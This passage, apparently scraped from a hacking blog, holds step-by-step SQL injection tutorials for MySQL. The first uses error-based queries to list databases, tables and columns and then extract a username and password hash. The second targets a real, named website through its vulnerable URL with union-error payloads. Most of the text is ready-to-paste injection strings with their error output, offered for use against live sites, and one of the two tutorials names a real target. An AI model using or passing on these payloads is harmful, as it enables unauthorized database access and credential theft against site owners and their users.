<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '5.1.65-cll' for key 1</code><br />It is a must to keep your query's clean there for yet again i advice the hackbar. Because one thing wrong results in an error without information.<br />We don't want that to happen do we <img alt=":)" class="smiley" src="https://top-hat-sec.com/forum/Smileys/aaron/smiley.gif" style="vertical-align: bottom;" title="Smiley" />. Let us get the database name.<br /><br /><span class="bbc_color" style="color: orange;">Get the Database Name.</span><br /><br />This is our query to get the database names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>As you have seen in error based the limit here is important. If you want to get all database names.<br /><br />I won't be explaining everything as i usually do ill ad up what is new. This really reduces my writing time.<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Here we select scheme_name (database) as characters. Whit the first LIMIT only the first increasing you get all database names.</span><br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'Ignotus_1' for key 1</code>Our database is Ignotus_1. Now its important to write down the database name.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Table Names.</span><br /><br /><br />Same as in error based the query's become more difficult as we advance! Keep attention and you will pick this up.<br /><br />!!Where it said 0x <span class="bbc_color" style="color: orange;">Ignotus_1</span> we need to ad the database name in HEX. The 0x in front is IMPORTANT!!<br />Our Query to extract our table names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />As we have learned for a few times now the limit will get us all tables. Keep increasing the first limit in the query until you have all tables. (The one behind our database name in HEX).<br /><br />Short explanation of what’s new in our query:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We again want the table names as characters shown in our error output.<br />Our database to select the table names from with a limit to get all tables. </span><br /><br />Now you should have a list of table names and look for a useful one.<br />Mine is USERS. Same as with error based we now want the column names of that table.<br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'USERS' for key 1</code><br /><br /><span class="bbc_color" style="color: orange;">Get the Column Names.</span><br /><br />!!Here we have to edit a few things again, Where it said 0x<span class="bbc_color" style="color: orange;">Ignotus_1</span> put your database name in HEX.<br />And where it said 0x<span class="bbc_color" style="color: orange;">USERS</span> put your table name you are going to use don't forget the 0x has to be there in order for MySQL to translate it. !!<br /><br />Another mind blowing query for extracting the columns:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />Yet again here is a limit the first one behind our database name in HEX, if we increase that limit we will get all columns.<br /><br />Short explanation of our new vector:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We want the column names from our database which is in hex and we want to select those column names from the table we chose and put in hex.</span><br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'Usernames' for key 1</code>Second error using a limit:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'Passwords' for key 1</code><br />Now we want to extract all the info we can get from these columns. Username and Password.<br /><br /><span class="bbc_color" style="color: orange;">Extracting Information from the Columns.</span><br /><br />Finally, Finally and Finally we are getting to an end i am getting bored writing anyway!<br />This is the part where we all know we get what we want!<br /><br />!!First of all there needs a little bit changing done in our query again!<br />Where it said <span class="bbc_color" style="color: orange;">USERS</span>.<span class="bbc_color" style="color: green;">Username</span> is where you put your table name and next your column name.<br />Yes This time we need 2 Query's in order to get Username and password. And Where it said <span class="bbc_color" style="color: orange;">Ignotus_1</span> we put our database name. (not in hex this time).!!<br /><br />This is our query to extract all data from our columns:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />Error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'uSploit' for key 1</code><br />Now for our passwords we only need to edit Username into passwords and execute.<br />This wil result in an error providing us the password.<br /><br />Error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code: <a class="codeoperation" href="" style="color: cornflowerblue; font-weight: normal;">[Select]</a></div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '4c0e8eb3ed67f58dc56e724e5297a598n' for key 1</code><br />Username: uSploit<br />Password: 4c0e8eb3ed67f58dc56e724e5297a598n<br /><br />That is enough ass hurting for today.<br />Thanks for taking your time, hope you enjoyed!<br /></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-3004560643840212122013-09-04T23:03:00.001-07:002013-09-04T23:03:07.437-07:00[TUTORIAL]UNION-ERROR BASED SQLI A.K.A ERROR BASED TYPE 2<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Hey guys,</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">It's Zer0 and I'll be explaining another type of Error Based SQL injection.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">So let's get started</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">The vulnerable link would be:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; font-weight: bold; line-height: 19.1875px; margin: 0px; padding: 0px;">Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">count(*) = Returns the total number of records in the table/view<br style="margin: 0px; padding: 0px;" />group by = Groups the result of the query set by one or more columns<br style="margin: 0px; padding: 0px;" />concat = shows the results in one column<br style="margin: 0px; padding: 0px;" />information_schema = The default database<br style="margin: 0px; padding: 0px;" />table_schema = Specified database<br style="margin: 0px; padding: 0px;" />table_name = The current table name<br style="margin: 0px; padding: 0px;" />limit = Limits the amount of content to be displayed<br style="margin: 0px; padding: 0px;" />mid() = Used to extract characters from a text field</code></div>
</div>
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">See more of the functions here:</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><a href="http://www.w3schools.com/sql/sql_functions.asp" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">http://www.w3schools.com/sql/sql_functions.asp</a><br />
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: x-small; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">NOTE: Make sure to organize the query if you're just gonna copy and paste!<br style="margin: 0px; padding: 0px;" />There could be some spaces in between</span></span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;"><span style="margin: 0px; padding: 0px; text-decoration: underline;"><span style="font-weight: bold; margin: 0px; padding: 0px;">Getting the version of their database (2 main ways to do it):</span></span></span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">First way:</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL will look like:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Second way:</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Query:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">URL will look like:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Results:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Screenshot: </span><br />
<div style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="spoiler_header" style="margin: 0px; padding: 0px;">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1838743374043175243" style="margin: 0px; padding: 0px; text-decoration: none;">(Click to Hide)</a></div>
<div class="spoiler_body" style="margin: 0px; padding: 0px;">
<img alt="[Image: lOnau.png]" border="0" height="181" src="http://i.imgur.com/lOnau.png" style="background-color: #111111; background-position: initial initial; background-repeat: initial initial; border: 1px solid rgb(34, 34, 34); margin: 0px; padding: 5px;" width="320" /></div>
</div>
